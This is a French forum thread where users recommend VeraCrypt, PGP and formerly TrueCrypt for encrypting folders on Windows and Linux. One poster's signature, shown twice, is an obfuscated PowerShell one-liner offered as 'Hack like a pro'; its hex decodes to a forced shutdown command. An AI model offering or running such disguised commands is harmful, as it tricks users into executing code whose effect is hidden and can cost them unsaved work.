Annonce

Réduire
Aucune annonce.

Protéger dossier

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Protéger dossier

    Hey ,

    vous me conseiller quoi comme applications pour crypter et protéger mes dossier (par mot de passe) Pour windows et linux

    Merci d'avance

  • #2
    Salut,

    Pour chiffrer (et non crypter! ) tes dossiers, cela dépend vraiment du besoin.
    Tu veux protéger quelques dossiers, ou tout un disque?
    Veux tu pouvoir ouvrir le conteneur sous Windows ET linux ou alors le(s) dossiers ne seront pas partagés entre OS?

    En fonction de tes réponses, il sera plus facile de t'orienter vers la bonne solution.
    Pour info de multiples solutions existent :

    - Full Disk Encryption : l'intégralité d'une partition est chiffré, il faut alors saisir le mot de passe pour ouvrir la partition (empêche le démarrage si il s'agit d'un partition système).
    - File encryption : on chiffre un fichier ou répertoire ce qui équivaut un conteneur chiffrer ouvert à la demande.

    @+
    Jackall
    Wiki Perso: Jackall IT Wiki - Site Pro: https://www.torii-security.fr
    Twitter : @IT_Jackall

    Commentaire


    • #3
      Envoyé par Jackall Voir le message
      Salut,

      Pour chiffrer (et non crypter! ) tes dossiers, cela dépend vraiment du besoin.
      Tu veux protéger quelques dossiers, ou tout un disque?
      Veux tu pouvoir ouvrir le conteneur sous Windows ET linux ou alors le(s) dossiers ne seront pas partagés entre OS?

      En fonction de tes réponses, il sera plus facile de t'orienter vers la bonne solution.
      Pour info de multiples solutions existent :

      - Full Disk Encryption : l'intégralité d'une partition est chiffré, il faut alors saisir le mot de passe pour ouvrir la partition (empêche le démarrage si il s'agit d'un partition système).
      - File encryption : on chiffre un fichier ou répertoire ce qui équivaut un conteneur chiffrer ouvert à la demande.

      @+
      Jackall ,

      Je voudrais quelque chose qui fonctionne sur linux et Windows (j'utilise les 2 et je ne veux pas que il communique) et aussi non je voudrais protéger des fichier (max 2giga) et il faudrais un mot de passe différent pas dossier protéger

      Commentaire


      • #4
        Tu peux regarder du côté de Veracrypt, remplaçant de TrueCrypt.

        Commentaire


        • #5
          +1 pour Veracrypt.
          Tu ne pourra pas chiffrer de répertoire à proprement parlé, mais des "volumes" considérés comme des partitions distinctes. Mais c'est qu'une question d'organisation. Coté utilisation c'est la même chose.
          Hack like a pro :
          PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

          Commentaire


          • #6
            Salut,
            +1 Pour Véracrypt, mais tu as également TrueCrypt en version 7.1a ( "ANSSI approuved").
            Et si ça te parait trop usine à gaz, tu peux regarder du côté de PGP et PGP4Win pour chiffrer des fichiers.

            ++
            Jackall
            Wiki Perso: Jackall IT Wiki - Site Pro: https://www.torii-security.fr
            Twitter : @IT_Jackall

            Commentaire


            • #7
              Jackall : je me trompe peut être mais pour moi truecrypt c'était mort comme projet :
              La version que tu cites date de début 2012, et la dernière version de 2014 avec un gros warning :
              Final release; neutered (only decryption capability); Warns that TrueCrypt has been discontinued on all operating systems and may contain unfixed security issues.

              Pour ça que tout le monde à switch "massivement" sur Veracrypt.

              Qu'est-ce qui te faisait conseiller TrueCrypt du coup ? Tu as d'autres infos ?
              Hack like a pro :
              PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

              Commentaire

              Chargement...
              X